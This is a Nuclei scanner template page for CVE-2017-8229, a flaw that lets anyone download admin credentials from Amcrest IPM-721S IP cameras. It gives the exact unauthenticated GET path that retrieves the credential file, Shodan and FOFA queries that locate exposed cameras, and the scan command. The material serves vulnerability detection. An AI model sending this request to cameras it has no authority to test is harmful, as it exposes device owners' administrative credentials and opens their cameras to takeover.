Skip to content

Amcrest IP Camera Web Management - Data Exposure

ID: CVE-2017-8229

Severity: critical

Author: pussycat0x

Tags: cve2017,cve,packetstorm,seclists,amcrest,iot

Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.

id: CVE-2017-8229
info:
name: Amcrest IP Camera Web Management - Data Exposure
author: pussycat0x
severity: critical
description: |
Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
impact: |
An attacker can gain unauthorized access to sensitive data.
remediation: |
Apply the latest firmware update provided by the vendor to fix the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
- http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
- https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
- https://seclists.org/bugtraq/2019/Jun/8
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-8229
cwe-id: CWE-255
epss-score: 0.93383
epss-percentile: 0.99075
cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: amcrest
product: ipm-721s_firmware
shodan-query:
- html:"Amcrest"
- http.html:"amcrest"
fofa-query:
- "Amcrest"
- amcrest
- body="amcrest"
tags: cve2017,cve,packetstorm,seclists,amcrest,iot
http:
- method: GET
path:
- "{{BaseURL}}/current_config/Sha1Account1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DevInformation"
- "SerialID"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a0047304502210099d6b6cfa133316ccc82085beea6402208ff0c3f37e20c13f2c97e9ffceb071502203f95ff2b46b8707ae36714cf69ade33d63198f18bc1df82143df6c2fc2ff9e46:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-8229.yaml"

View on Github